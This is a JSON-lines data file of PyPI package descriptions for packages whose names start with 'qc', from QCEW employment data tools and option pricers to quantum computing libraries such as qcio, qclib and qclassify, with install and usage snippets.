employment and pay data for the United States from 2001 to 2021.data=qcew.get_qcew_data_slice(slice_type=\"area\",qcew_codes=[\"US000\"],years=[str(i)foriinrange(2001,2022)],annual_data=True,fields=[\"area_fips\",\"own_code\",\"industry_code\",\"year\",\"disclosure_code\",\"annual_avg_emplvl\",\"avg_annual_pay\"])# Get monthly employment data for the state of Hawaii as well as Honolulu County, HI in 2020.data=qcew.get_qcew_data_slice(slice_type=\"area\",qcew_codes=[\"15000\",# Hawaii -- Statewide\"15003\",# Honolulu County, HI],years=[\"2020\"],annual_data=False,fields=[\"area_fips\",\"own_code\",\"industry_code\",\"year\",\"qtr\",\"disclosure_code\",\"month1_emplvl\",\"month2_emplvl\",\"month3_emplvl\"])# Get annual average employment and pay data for the manufacturing sector as a whole from 2010 to 2020.data=qcew.get_qcew_data_slice(slice_type=\"industry\",qcew_codes=[\"31-33\",# NAICS code for manufacturing sector.],years=[str(i)foriinrange(2010,2021)],annual_data=True,fields=[\"area_fips\",\"own_code\",\"industry_code\",\"year\",\"disclosure_code\",\"annual_avg_emplvl\",\"avg_annual_pay\"])# Get monthly employment data for establishments with fewer than 5 employees in the first quarter of 2021.data=qcew.get_qcew_data_slice(slice_type=\"size\",qcew_codes=[\"1\",# Size code for establishments with fewer than 5 employees.],years=[\"2021\"],annual_data=False,fields=[\"area_fips\",\"own_code\",\"industry_code\",\"size_code\",\"year\",\"qtr\",\"disclosure_code\",\"month1_emplvl\",\"month2_emplvl\",\"month3_emplvl\"])LicenseDistributed under the MIT license. SeeLICENSEfor more information."} +{"package": "qcfinancial", "pacakge-description": "Derivative Valuation EngineLibrer\u00eda para la valorizaci\u00f3n de derivados lineales de tasa de inter\u00e9s y tipo de cambio.Library for the valuation of linear interest rate and fx rate derivatives."} +{"package": "qcfoptions", "pacakge-description": "Option Calculator and SimulatorGit Repository : [https://github.com/austingriffith94/qcfoptions](https://github.com/austingriffith94/qcfoptions)An option calculator born from the need to calculate the prices of various options in the QCF program at Georgia Tech. This package provides:Black Scholes pricing of traditional, barrier and exotic optionsGreeks of European style optionsSimulations of underlying asset using stochastic processesPricing of options utilizing the simulated motion of the underlyingThis was made initially to help avoid rewriting a Black Scholes calculators each time it was necessary. I\u2019m hoping it can also provide an outlet for those looking for a general code/framework to help in the creation and experimentation of their own option simulations. Each function and class has a complete explanation on what it does, should the user be interested. For example, if you want to know how to work the European option function, simply type :>>> from qcfoptions import bsoptions>>> help(bsoptions.EuroOptions)into the command console, and it should return a relatively complete description of the function.You can install this package from PyPI by using the command :pip install qcfoptionsPlatform: UNKNOWN\nClassifier: Development Status :: 3 - Alpha\nClassifier: Intended Audience :: Financial and Insurance Industry\nClassifier: License :: OSI Approved :: MIT License\nClassifier: Natural Language :: English\nClassifier: Programming Language :: Python :: 3\nRequires-Python: ~=3.0\nDescription-Content-Type: text/markdown"} +{"package": "qcfractal", "pacakge-description": "No description available on PyPI."} +{"package": "qcfractalcompute", "pacakge-description": "No description available on PyPI."} +{"package": "qcge", "pacakge-description": "Quantum Circuit Game Engine for Pygame-based Quantum GamesThis is a Quantum Circuit Game Engine for integrating Quantum Circuits into your Pygame-based quantum game. You can use it simply by creating an object of theQuantumCircuitGridclass stored in thequantum_circuit.pyfile.This Quantum Circuit was originaly created for theQPong Gamedeveloped byJunye Huangin the12 Days of Qiskit Program. I created this engine by re-writing its code locatedhereto make it modular and abstract for easy use with any quantum game.The features I have included are:Modular and Abstract Code.All configurations in one place in theconfig.pyfile.Developers can create a Quantum Circuit for any number of qubit/wires and circuit width (max. number of gates which can be applied in a wire) of their choice.Easy to change UI by replacing color configs and graphics for gates with those of your choice.Easy to change the size of Quantum Circuit by adjustingQUANTUM_CIRCUIT_TILE_SIZE,GATE_TILE_WIDTH, andGATE_TILE_HIEGHTin theconfig.pyfile.Easily change controls by changing keys in thehandle_input()method of theQuantumCircuitGridclass.If this project is helpful for you or you liked my work, consider supporting me throughKo.fi\ud83c\udf75. Also, kindly consider giving a star to this repository.\ud83d\ude01About meI am Ashmit JaiSarita Gupta, an Engineering Physics Undergraduate passionate about Quantum Computing, Machine Learning, UI/UX, and Web Development. I have worked on many projects in these fields, participated in hackathons, and am a part of great organizations in these fields. You can explore more about me, my work, and my experience at various organizations through my portfolio website:https://jaisarita.vercel.app/\u2604\ufe0fInstallationpipinstallqcgeUsageYou can use it simply by creating an object of theQuantumCircuitGridclass stored in thequantum_circuit.pyfile. The constructor ofQuantumCircuitGridtakes these values as argument:position: Position of the Quantum Circuit in the game window.num_qubits: Number of Qubits in the Quantum Circuit.num_columns: Circuit width (max. number of gates which can be applied in a wire) of their choice.tile_size(Optional, Default Value = 36): Size of single tile unit of the Quantum Circuit. It is the square area containing single gate in the quantum circuit.gate_dimensions(Optional Default Value = [24, 24]): [Width, Height] of quantum gates.background_color(Optional Default Value = '#444654'): Background Color of the Quantum Circuit.wire_color(Optional Default Value = '#ffffff'): Color of Quantum Wire in the Quantum Circuit.gate_phase_angle_color(Optional Default Value = '#97ad40'): Color to represent phase angle of Rotation Gates.You can run your quantum circuit on BasicAer Simulator by using this function:defrun_quantum_circuit(self,quantum_circuit):simulator=BasicAer.get_backend(\"statevector_simulator\")quantum_circuit.measure_all()transpiled_circuit=transpile(quantum_circuit,simulator)counts=simulator.run(transpiled_circuit,shots=1).result().get_counts()measured_state=int(list(counts.keys())[0],2)returnmeasured_stateConfigurationsAll the configurations for Quantum Circuit can be done in theconfig.pyfile. The controls of the quantum circuit in the game can be changed from the defaults mentioned below by changing keys in thehandle_input()method of theQuantumCircuitGridclass.You can change the size of Quantum Circuit by passing optional parameterstile_size, andgate_dimensions(= [GATE_TILE_WIDTH, GATE_TILE_HIEGHT]) to theqcge.QuantumCircuitGridclass as parameters.You can change UI colors by passing optional parametersbackground_color,wire_color, andgate_phase_angle_colorto theqcge.QuantumCircuitGridclass as parameters.Default values of these optional parameter are:tile_size=36gate_dimensions=[24,24]background_color='#444654'wire_color='#ffffff'gate_phase_angle_color='#97ad40'Game Controls for Building Quantum CircuitW, A, S, D Keys:Move the \"Circuit Cursor\" in the Quantum Circuit to the place where you want to add a gate in the circuit.Backspace Key:Remove the gate present at the Circuit Cursor.Delete Key:Clear the Quantum Circuit, i.e., remove all gates from the Quantum Circuit.X Key:Add X Gate to the quantum circuit.Y Key:Add Y Gate to the quantum circuit.Z Key:Add Z Gate to the quantum circuit.H Key:Add H Gate to the quantum circuit.C, R, E Keys:PressC Keyto convert the X, Y, Z, or H gates into CX, CY, CZ, and CH gates respectively, and then pressR KeyandF Keyto the control to qubit above or below respectively.Q and E Keys:To convert X, Y, and Z into RX, RY, and RZ gates respectively.Q Keydecreases the rotation angle by \u03c0/8 andE Keyincreases the rotation angle by \u03c0/8."} +{"package": "qcg-pilotjob", "pacakge-description": "QCG-PilotJobQCG-PilotJob is a lightweight service for execution of many computing tasks inside one allocationAuthor: Piotr Koptapkopta@man.poznan.pl, Tomasz Piontekpiontek@man.poznan.pl, Bartosz Bosakbbosak@man.poznan.plCopyright (C) 2017-2021 Poznan Supercomputing and Networking CenterOverviewThe QCG-PilotJob system is designed to schedule and execute many small jobs inside one scheduling system allocation.\nDirect submission of a large group of jobs to a scheduling system can result in long aggregated time to finish as\neach single job is scheduled independently and waits in a queue. On the other hand the submission of a group of jobs\ncan be restricted or even forbidden by administrative policies defined on clusters.\nOne can argue that there are available job array mechanisms in many systems, however the traditional job array\nmechanism allows to run only bunch of jobs having the same resource requirements while jobs being parts of\na multiscale simulation by nature vary in requirements and therefore need more flexible solutions.The core component of QCG-PilotJob system is QCG-PilotJob Manager.\nFrom the scheduling system perspective, QCG-PilotJob Manager, is seen as\na single job inside a single user allocation. It means that QCG-PilotJob Manager controls an execution\nof a complex experiment consisting of many\njobs on resources reserved for the single job allocation. The manager\nlistens to user's requests and executes commands like submit job, cancel\njob and report resources usage. In order to manage the resources and\njobs the system takes into account both resources availability and\nmutual dependencies between jobs. Two interfaces are defined to\ncommunicate with the system: file-based (batch mode) and API based. The former\none is dedicated and more convenient for a static scenarios when a\nnumber of jobs is known in advance to the QCG-PilotJob Manager start.\nThe API based interface is more general and flexible as it allows to\ndynamically send new requests and track execution of previously\nsubmitted jobs during the run-time.To allow user's to test their scenarios, QCG-PilotJob Manager supportslocalexecution mode, in which all job's\nare executed on local machine and doesn't require any scheduling system allocation.DocumentationThe documentation of the QCG-PilotJob system is available athttps://qcg-pilotjob.readthedocs.orgInstallationThe latest stable version of QCG-PilotJob can be installed with pip$pipinstallqcg-pilotjob"} +{"package": "qcg-pilotjob-cmds", "pacakge-description": "QCG-PilotJob Command Line Tools (cmds)The package provides a set of command line tools for reporting and analysis of QCG-PilotJob execution.Author: Piotr Koptapkopta@man.poznan.pl, Tomasz Piontekpiontek@man.poznan.pl, Bartosz Bosakbbosak@man.poznan.plCopyright (C) 2017-2021 Poznan Supercomputing and Networking CenterDocumentationThe documentation of the QCG-PilotJob system is available athttps://qcg-pilotjob.readthedocs.orgInstallationThe latest stable version of QCG-PilotJob Command Line Tools can be installed with pip$pipinstallqcg-pilotjob-cmds"} +{"package": "qcg-pilotjob-executor-api", "pacakge-description": "QCG-PilotJob Executor APIQCG-PilotJob Executor API, by imitation of the Python Executor API,\nprovides a relatively easy way of usage of QCG-PilotJob. It is targeted to\nfulfil needs of basic execution scenarios, but may be useful also for more advanced ones.Author: Piotr Koptapkopta@man.poznan.pl, Tomasz Piontekpiontek@man.poznan.pl, Bartosz Bosakbbosak@man.poznan.plCopyright (C) 2017-2021 Poznan Supercomputing and Networking CenterDocumentationThe documentation of the QCG-PilotJob system is available athttps://qcg-pilotjob.readthedocs.orgInstallationThe latest stable version of QCG-PilotJob Executor API can be installed with pip$pipinstallqcg-pilotjob-executor-api"} +{"package": "qcgpu", "pacakge-description": "QCGPUOpen Source, High Performance & Hardware Accelerated, Quantum Computer\nSimulator. Read theresearch paper.Features:Written with OpenCL. Accelerated your simulations with GPUs and other\naccelerators, while still running cross device and cross platform.Simulation of arbitrary quantum circuitsIncludes example algorithm implementationsSupport for arbitrary gate creation/application, with many built in.InstallingThis library is distributed onPyPIand can be installed using\npip:$pipinstallqcgpuFor more information read the fullinstalling docs."} +{"package": "qcgrid", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qche", "pacakge-description": "UNKNOWN"} +{"package": "qcheck", "pacakge-description": "No description available on PyPI."} +{"package": "qchecker", "pacakge-description": "qCheckerQuick Checker? Quality Checker? Quinoa Checker? qChecker can be whatever you\nwant it to be.qChecker is a library intended to identify semantically meaningful\nmicro-antipatterns in student code and can describe those issues to students\nalong with how to fix them. For example, have your students ever written code\nlike this?deffoo(x):ifx%2==0:returnTrueelse:returnFalseqChecker is here to help! TheIfElseReturnBoolpattern will have no problem\nidentifying this. Even specifying where in the code the defect is:TextRange(2,4->5,20)and providing a description of the error with isomorphic\nrefactorings:Looks like you are returning two booleans inside of an If/Else statement.\nIt might be better if you just return the If condition or its inverse.For example, instead of:ifx<5:returnTrueelse:returnFalseConsider doing this:returnx<5...DocumentationCheck out the documentation for qChecker on ReadTheDocs:https://qchecker.readthedocs.io/Installpip install qcheckerUsageCurrently, concrete subclasses ofqchecker.Substructuredefine\naniter_matchesclass method which iterates overqchecker.match.Matchobjects identifying where in the code those particular substructures occur.For example:fromqchecker.substructuresimportIfElseReturnBoolcode=\"\"\"class Foo:def __init__(self, x):self.x = xdef bar(self):if self.x < 10:return Trueelse:return False\"\"\".strip()matches=IfElseReturnBool.iter_matches(code)print(IfElseReturnBool.technical_description)print(*matches,sep=\"\\n\")would print thetechnical_descriptionof theIfElseReturnBoolSubstructure\nfollowed by aMatchobject containing the mane of the pattern matched, the\ndescription, and theTextRangewhere the pattern occurs.If(..)[Return bool] Else[Return !bool]\nMatch(\"If/Else Return Bool\", \"Looks like you are returning two [...]\", TextRange(6,8->9,24))ASUBSTRUCTURESconstant is included in thesubstructuresmodule that\ncontains all substructures. This can be used, for example:fromqchecker.substructuresimportSUBSTRUCTURESfromqchecker.parserimportCodeModulecode=CodeModule(r'''def foo(x):x = x + 1if (x < 5) == True:return Trueelse:return False'''.strip())matches=[]forsubstructureinSUBSTRUCTURES:matches+=substructure.iter_matches(code)formatchinmatches:print(match)Which will produce the following matches:Match(\"Redundant Comparison\", \"It seems like you are comparing [...]\", TextRange(3,7->3,22))\nMatch(\"Augmentable Assignment\", \"It looks like you are writting an [...]\", TextRange(2,4->2,13))\nMatch(\"If/Else Return Bool\", \"Looks like you are returning two [...]\", TextRange(3,4->6,20))Note:While theiter_matchescan take a string of code as a parameter, if you intend\nto match the same piece of code against several substructures, it is better to\nparse the code first into a singleCodeModuleto use with all substructures.\nThis has been shown to improve performance 3-4 times on assignment-sized\nprojects (80-400 lines of code).The string parameter to theiter_matchesetc. methods is deprecated and will\nbe removed in future versions.What Assumptions does qChecker Make?qChecker assumes the code it is working on is relatively simple and isn't using\nany of Python's black magic features in strange ways. This means qChecker is\nonly appropriate for novice students as some assumptions it makes about the\nproperties of the code it operates on are quite bold.For example, qChecker assumes multiplication will always be commutative, that\nevery object that supports a particular operator (e.g.__add__) will always\nhave the corresponding augmented operator (e.g.__iadd__), and that functions\ndon't have any strange and wacky side effects that would cause subsequent calls\nin the same expression to behave differently \u2013 among others.Extras - Programmatic Flake8 and Pylintqchecker can be installed with support for programmatically running flake8 and\npylint to generate match objects.Install qchecker with the extras \"general_checks\":pip install qchecker[general_checks]This will allow you to import thegeneralmodule of qchecker which reveals two\nfunctions:get_flake8_matches(code: str) -> list[Match]which returns the matches\ndetected by flake8.get_pylint_matches(code: str, errors: list[str] = None) -> list[Match]which\nreturns the matches detected by pylint. A list of pylint error codes can be\nprovided to only detect those errors and ignore all others.CitationIf you use this software, please cite it as below:@software{finnie-ansley2022qchecker,\n author = {Finnie-Ansley, James},\n month = {6},\n title = {{qChecker}},\n url = {https://github.com/James-Ansley/qchecker},\n version = {1.1.0},\n year = {2022}\n}"} +{"package": "qchk", "pacakge-description": "qcheckA script to display user quota info graphically on the terminalThis is just a wrapper script around quota -a, therefore quota should be installed and users should have access to itStoragespacereportforuser'saccount:storage:|==============|40%,393MBused,583MBfreefilecount:|===========|34%,6822Used,13178FreeInstall and build locallygitclone$repopip3installbuild\naptinstallpython3-virtualenvcd$repopython3-mbuildpip3installdist/qcheck...*...whlCool use casesYou can have qcheck run on login for a user by placing the following in/etc/profile.d/motd.sh/usr/local/bin/qcheck $USER"} +{"package": "qchviewer", "pacakge-description": "qchviewerA simple script to directly open standalone Qt Help file by AssistantFree software: Apache License 2.0Documentation:https://qchviewer.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand thePyPackageTemplateproject template.History0.1.0 (2017-08-08)First release."} +{"package": "qci-client", "pacakge-description": "QCI ClientGetting startedEnvironment VariablesThese environment variables must be set in order to use access the API--QCI_TOKEN - token for Qatalyst APIQCI_API_URL - Example: \"https://api.qci-prod.com\"Installationqci-clientcurrently supports Python 3.8-11, as specified in the PEP-621-compliant\npyproject.toml.Installqci-clientfrom thepublic PyPI serverinto your Python virtual environment using--pipinstallqci-client"} +{"package": "qcinfo", "pacakge-description": ""} +{"package": "qcio", "pacakge-description": "Quantum Chemistry I/OBeautiful and user friendly data structures for quantum chemistry.Inspired byQCElemental. Built for consistency and rapid development.qcioworks in harmony with a suite of other quantum chemistry tools for fast, structured, and interoperable quantum chemistry.The QC Suite of Programsqcio- Beautiful and user friendly data structures for quantum chemistry.qcparse- A library for efficient parsing of quantum chemistry data into structuredqcioobjects.qcop- A package for operating quantum chemistry programs usingqciostandardized data structures. Compatible withTeraChem,psi4,QChem,NWChem,ORCA,Molpro,geomeTRICand many more.BigChem- A distributed application for running quantum chemistry calculations at scale across clusters of computers or the cloud. Bring multi-node scaling to your favorite quantum chemistry program.ChemCloud- Aweb applicationand associatedPython clientfor exposing a BigChem cluster securely over the internet.InstallationpipinstallqcioQuickstartqciois built around a simple mental model:Inputobjects are used to define inputs for a quantum chemistry program, andOutputobjects are used to capture the outputs from a quantum chemistry program.Allqcioobjects can be serialized and saved to disk by calling.save(\"filename.json\")and loaded from disk by calling.open(\"filename.json\").qciosupportsjson,yaml, andtomlfile formats. Binary data will be automatically base64 encoded and decoded when saving and loading.Input ObjectsProgramInput - Core input object for a single QC program.fromqcioimportMolecule,ProgramInput# xyz files or saved Molecule objects can be opened from diskcaffeine=Molecule.open(\"caffeine.xyz\")# Define the program inputprog_input=ProgramInput(molecule=caffeine,calctype=\"energy\",keywords={\"purify\":\"no\",\"restricted\":False},model={\"method\":\"hf\",\"basis\":\"sto-3g\"},extras={\"comment\":\"This is a comment\"},# Anything extra not in the schema)# Binary or other files used as input can be addedprog_input.open_file(\"wfn.dat\")prog_input.keywords[\"initial_guess\"]=\"wfn.dat\"# Save the input to disk in json, yaml, or toml formatprog_input.save(\"input.json\")# Open the input from diskprog_input=ProgramInput.open(\"input.json\")DualProgramInput - Input object for a workflow that uses multiple QC programs.DualProgramInputobjects can be used to power workflows that require multiple QC programs. For example, a geometry optimization workflow might usegeomeTRICto power the optimization and useterachemto compute the energies and gradients.fromqcioimportMolecule,DualProgramInput# xyz files or saved Molecule objects can be opened from diskcaffeine=Molecule.open(\"caffeine.xyz\")# Define the program inputprog_input=DualProgramInput(molecule=caffeine,calctype=\"optimization\",keywords={\"maxiter\":250},subprogram=\"terachem\",subprogram_args={\"model\":{\"method\":\"hf\",\"basis\":\"sto-3g\"},\"keywords\":{\"purify\":\"no\",\"restricted\":False},},extras={\"comment\":\"This is a comment\"},# Anything extra not in the schema)FileInput - Input object for a QC programs using native file formats.qcioalso supports the native file formats of each QC program with aFileInputobject. Assume you have a directory like this with your input files forpsi4:psi4/\n input.dat\n geometry.xyz\n wfn.datYou can collect these native files and any associated command line arguments needed to specify a calculation into aFileInputobject like this:fromqcioimportFileInputpsi4_input=FileInput.from_directory(\"psi4\")# All input files will be loaded into the `files` attributepsi4_input.files# {'input.dat': '...', 'geometry.xyz': '...', 'wfn.dat': '...'}# Add psi4 command line args to the inputpsi4_input.cmdline_args.extend([\"-n\",\"4\"])# Files can be dumped to a directory for a calculationpsi4_input.save_files(\"psi4\")Modifying Input ObjectsObjects are immutable by default so if you want to modify an object cast it to a dictionary, make the desired modification, and then instantiate a new object. This prevents accidentally modifying objects that may already be referenced in other calculations--perhaps as.input_dataon anOutputobject.# Cast to a dictionary and modifynew_input_dict=prog_input.model_dumps()new_input_dict[\"model\"][\"method\"]=\"b3lyp\"# Instantiate a new objectnew_prog_input=ProgramInput(**new_input_dict)Output ObjectsSinglePointOutput and OptimizationOutputCurrently supportedOutputobjects includeSinglePointOutputfor energy, gradient, and hessian calculations; andOptimizationOutputfor optimization and transition state calculations. AllOutputobjects have the same basic API:output.input_data# Input data used by the QC programoutput.success# Whether the calculation succeededoutput.results# All structured results from the calculationoutput.stdout# Stdout log from the calculationoutput.pstdout# Shortcut to print out the stdout in human readable formatoutput.files# Any files returned by the calculationoutput.provenance# Provenance information about the calculationoutput.extras# Any extra information not in the schemaThe only difference between aSinglePointOutputand anOptimizationOutputis theresultsattribute.SinglePointOutputobjects have aSinglePointResultsobject, andOptimizationOutputobjects have anOptimizationResultsobject. Available attributes for each result type can be found by callingdir()on the object.dir(output.results)Results can be saved to disk in json, yaml, or toml format by calling.save(\"filename.{json/yaml/toml}\")and loaded from disk by calling.open(\"filename.{json/yaml/toml}\").ProgramFailureFailed calculations are represented by aProgramFailureobject. This object has the same API asOutputobjects but also has a.tracebackattribute that captures the stack trace.output.traceback# Stack trace from the failed calculationoutput.ptraceback# Shortcut to print out the traceback in human readable formatSupportIf you have any issues withqcioor would like to request a feature, please open anissue."} +{"package": "qc-iodata", "pacakge-description": "AboutIOData is a HORTON 3 module for input/output of quantum chemistry file formats.\nDocumentation is here:https://iodata.readthedocs.io/en/latest/index.htmlCitationPlease use the following citation in any publication using IOData library:\u201cIOData: A python library for reading, writing, and converting computational chemistry file\nformats and generating input files.\u201d, T. Verstraelen, W. Adams, L. Pujal, A. Tehrani, B. D.\nKelly, L. Macaya, F. Meng, M. Richer, R. Hernandez\u2010Esparza, X. D. Yang, M. Chan, T. D. Kim, M.\nCools\u2010Ceuppens, V. Chuiko, E. Vohringer\u2010Martinez,P. W. Ayers, F. Heidar\u2010Zadeh,J Comput Chem. 2021; 42: 458\u2013 464.InstallationIn anticipation of the 1.0 release of IOData, install the latest git revision\nas follows:python-mpipinstallgit+https://github.com/theochem/iodata.gitAdd the--userargument if you are not working in a virtual or conda\nenvironment. Note that there may be API changes between subsequent revisions.Seehttps://iodata.readthedocs.io/en/latest/install.htmlfor full details."} +{"package": "qcirc", "pacakge-description": "Fast and comfortable circuit compiling to pulse"} +{"package": "qcircuit", "pacakge-description": "No description available on PyPI."} +{"package": "qcis-sim", "pacakge-description": "A simulator for QCIS.fromqcis_simimportrunqcis_str=\"\"\"H Q22H Q27X Q27Y Q27Z Q27S Q27SD Q27T Q27TD Q27CZ Q27 Q22B Q1 Q4I Q1 0.1RX Q22 0.2RY Q22 0.2RZ Q10 0.2M Q22M Q27\"\"\"print(run(qcis_str,shots=100,topo=True))# topo: topological check"} +{"package": "qck", "pacakge-description": "# Qck \ud83e\udd86\ud83d\udc69\u200d\ud83d\udcbbQck (pronounced \u201cquack\u201d) is a CLI script to conveniently run\n[DuckDB](https://duckdb.org/) SQL scripts with support for\n[Jina](https://jinja.palletsprojects.com/) templating.## \ud83d\udee0\ufe0f InstallationUsepip install qckto install. This will make available theqckscript.## \ud83d\ude80 UsageRunqck \u2013helpto view the built-in documentation.Runningqckwith just a SQL file will execute the query and print\nthe results to the terminal:`bash qck myquery.sql `You can also LIMIT the number of rows in the output by adding a flag:`bash qck myquery.sql--limit10 # will only print 10 rows `To execute a query and write the result to a Parquet file, use\u2013to-parquet:`bash qck myquery.sql--to-parquetmyresult.parquet `"} +{"package": "qckit", "pacakge-description": "No description available on PyPI."} +{"package": "qck-pyiseasy", "pacakge-description": "The Python-Easy ProjectMade by Tarvey@github quaqak@youtubeHow to use it?Its easy! just type \"pip install easypython\"Commandsshow - Shows text on the screeniw = Prints and waits for user input.docmd - Runs a command in bash or cmd.Functionsiswin() - Checks if a user is on windows.if iswin():\nshow(\"Hi Windows User!\")"} +{"package": "qcktypes", "pacakge-description": "qcktypesPython implementation ofDyne's file extension listWhat is thisThere I was, trying to get files out of a directory and categorize them based on their file extension. \"This is probably already a module\" I said. I was right, there it was, gloriousfiletype.\"Wait... what is a MIME bruh \ud83d\ude2d\"I don't want to validate files actually, just tell me what they areThe modulefiletypevalidates files with theirmagic numbersor whatever, but I didn't want that. I foundDyne's file extension listand quickly wrote up this module since I couldn't find anything similar. I would write more features but I know literally nobody will ever use this so it's probably fine.Rather than validating files with their magic numbers this module simply checks the extension of an input file and compares it with a dictionary of extensions and returns its category.Installingpython3 -m pip install -U qcktypesQuick exampleimportqcktypesfile='example.txt'category=qcktypes.find_type(file)print(f'{file}is in category:{category}!')output :$ python3 example.py\nexample.txt is in category: text!"} +{"package": "qcl", "pacakge-description": "UNKNOWN"} +{"package": "qclassify", "pacakge-description": "# QClassify## DescriptionQClassify is a Python framework for implementing variational quantum classifiers. The goal is to provide a generally customizable way of performing classification tasks using gate-model quantum devices. The quantum devices can be either simulated by a quantum simulator or a cloud-based quantum processor accessible via Rigetti Computing's [Quantum Cloud Services](https://www.rigetti.com/qcs).Variational quantum classification is a paradigm of supervised quantum machine learning that has been investigated actively in the quantum computing community (See for instance [Farhi and Neven](https://arxiv.org/abs/1802.06002), [Schuld et al.](https://arxiv.org/abs/1804.00633), [Mitarai et al.](https://arxiv.org/abs/1803.00745) and [Havlicek et al.](https://arxiv.org/abs/1804.11326)). The general framework adopted in the design of QClassify follows from these contributions in the literature. The workflow can be summarized in Figure 1 below.![Flow chart](https://github.com/zapatacomputing/QClassify/blob/master/images/qclassify.png)*Figure 1: Diagram illustrating the workflow of QClassify. Each rectangle represents a data object and each oval represents a method.*## Main ComponentsThe main data structure describing the quantum classifier setting is in `qclassifier.py`. The implementation allows for modular design of the following components of a quantum classifier (Figure 1):1. **Encoder**: transforms a classical data vector into a quantum state. See `encoder.py`.+ 1.1 **Classical preprocessor**: maps an input data vector to circuit parameters. See `preprocessing.py`.+ 1.2 **Quantum state preparation**: applies the parametrized circuit to an all-zero input state to generate a quantum state encoding the input data. See `encoding_circ.py`.2. **Processor**: extracts classical information from the encoded quantum state. See `processor.py`.+ 2.1 **Quantum state transformation**: applies a parametrized circuit to the encoded quantum state to transform it into a form more amenable for information extraction by measurement and classical postprocessing. See `proc_circ.py`.+ 2.2 **Information extraction**: extract classical information from the output quantum state. See `postprocessing.py`.- 2.2.1 **Measurement**: repeatedly run the quantum circuit, perform measurements and collect measurement statistics- 2.2.2 **Classical postprocessing**: Glean information from the measurement statistics and produce the output label of the quantum classifier.## InstallationTo install QClassify using ``pip``:pip install qclassifyTry executing ``import qclassify`` to test the installation in your terminal.To instead install QClassify from source, clone this repository, ``cd`` into it, and run:git clone https://github.com/zapatacomputing/QClassifycd QClassifypython -m pip install -e .Note that the pyQuil version used requires Python 3.6 or later. For installation on a user QMI, please click [here](https://github.com/hsim13372/QCompress/blob/master/qmi_instructions.rst).## ExamplesWe provide a Jupyter notebook to demonstrate the utility of QClassify.Notebook | Feature(s)---------|---------------[qclassify_demo.ipynb](https://github.com/zapatacomputing/QClassify/blob/master/examples/qclassify_demo.ipynb) | Uses a simple two-qubit circuit to learn the XOR dataset.## DisclaimerWe note that there is a lot of room for improvement and fixes. Please feel free to submit issues and/or pull requests!## How to citeWhen using QClassify for research projects, please cite:>\tSukin Sim, Yudong Cao, Jonathan Romero, Peter D. Johnson and Al\u00e1n Aspuru-Guzik.*A framework for algorithm deployment on cloud-based quantum computers*.[arXiv:1810.10576](https://arxiv.org/abs/1810.10576). 2018.## Authors[Yudong Cao](https://github.com/yudongcao),[Sukin (Hannah) Sim](https://github.com/hsim13372) (Harvard)"} +{"package": "qcli", "pacakge-description": "UNKNOWN"} +{"package": "qclib", "pacakge-description": "Quantum computing library (qclib)Qclib is a quantum computing library implemented using qiskit.The focus of qclib is on preparing quantum states, but it is not limited to that.InstalationThe easiest way of installing qclib is by using pip:pipinstallqclibInitializing your first quantum state with qclibNow that qclib is installed, you can start building quantum circuits to prepare quantum states. Here is a basic example:$ pythonimportnumpyasnpfromqiskitimporttranspilefromqiskit_aerimportAerSimulatorfromqclib.state_preparationimportLowRankInitialize# Generate 3-qubit random input state vectorn=3rnd=np.random.RandomState(42)input_vector=rnd.rand(2**n)+rnd.rand(2**n)*1jinput_vector=input_vector/np.linalg.norm(input_vector)# Build a quantum circuit to initialize the input vectorcircuit=LowRankInitialize(input_vector).definition# Construct an ideal simulatorbackend=AerSimulator()# Tests whether the produced state vector is equal to the input vector.t_circuit=transpile(circuit,backend)t_circuit.save_statevector()state_vector=backend.run(t_circuit).result().get_statevector()print('Equal:',np.allclose(state_vector,input_vector))# Equal: TrueComparing algorithms for quantum state preparationThe following table shows the depth, number of qubits, and CNOTs of circuits produced by different state preparation methods for the same random 15-qubit state.methodlibqubitscnotsdepthlow-rankqclib153099853643svdqclib153881471580ucgqclib153275265505isometryqiskit153275265505multiplexorqiskit1565504131025bdspqclib1151723201603dcspqclib32767262016899You can reproduce the resultshere.AuthorsThe first version of qclib was developed atCentro de Inform\u00e1tica- UFPE.\nQclib is an active project, andother peoplehave contributed.If you are doing research using qclib, please cite our project.\nWe use aCITATION.cfffile, so you can easily copy the citation information from the repository landing page.Licenseqclib isfreeandopen source, released under the Apache License, Version 2.0."} +{"package": "qclient", "pacakge-description": "qclientClient for running quantum applications on qserver instances. Seehttps://quantum.tecnalia.com.InstallpipinstallqclientUsageimportqclientqclient.configure({'token':'YOUR_TOKEN'})print(qclient.get('bell'))print(qclient.execute('bell'))print(qclient.execute(circuit.qasm()))Methodsconfigure({ server?, ext? ,token? }):server: default server athttps://quantum.tecnalia.com.ext: default '.qasm', useful in case always using the same language to represent the algorithm.token: default '', authorization token to execute services. E.g.:configure({\"token':'kkajsdkj-sudiuawjd....\"}).get(algorithm_name): the algorithm in plain text, the extension of the file is optional. E.g.:get('bell').execute(algorithm_name or algorithm_description): based on the extension, an engine executes the algorithm and provides the result as string (depending on the engine, the result format can vary). E.g.:execute('bell'). If the algorithm is not stored yet, it can be executed by providing the text representation (in qasm, quil, etc.). E.g: execute('...qasm_string')."} +{"package": "q-client", "pacakge-description": "Q-clientThis is only a proxy toqclientpackage. Created only to prevent malicious packages with similar names. Useqclientinstead."} +{"package": "qclight", "pacakge-description": "Simple and lightweight Quantum Computing simulator built with python3 for educational purposes.InstallationpipinstallqclightExample\"\"\"Main\"\"\"fromqclight.circuitimportQCLVisualCircuitdefmain():\"\"\"Simple main function\"\"\"circuit=QCLVisualCircuit(4)circuit.h(0)circuit.cx(0,3)circuit.barrier()circuit.x(2)print(circuit)if__name__==\"__main__\":main()TODOImprove performance with a custom range function for fixed bitsMeasure qubitAdd more examplesPrint ascii of circuitPrint svg of circuitCircuit compositionCircuit to gateSumCircuit"} +{"package": "qclipx", "pacakge-description": "QClipXCross platform clipboard tool.RequirementsPySide6-EssentialspyhexeditInstallpip install qclipx"} +{"package": "qcloud", "pacakge-description": "# qcloudref:http://guide.python-distribute.org/creation.html"} +{"package": "qcloudapi", "pacakge-description": "UNKNOWN"} +{"package": "qcloudapi3", "pacakge-description": 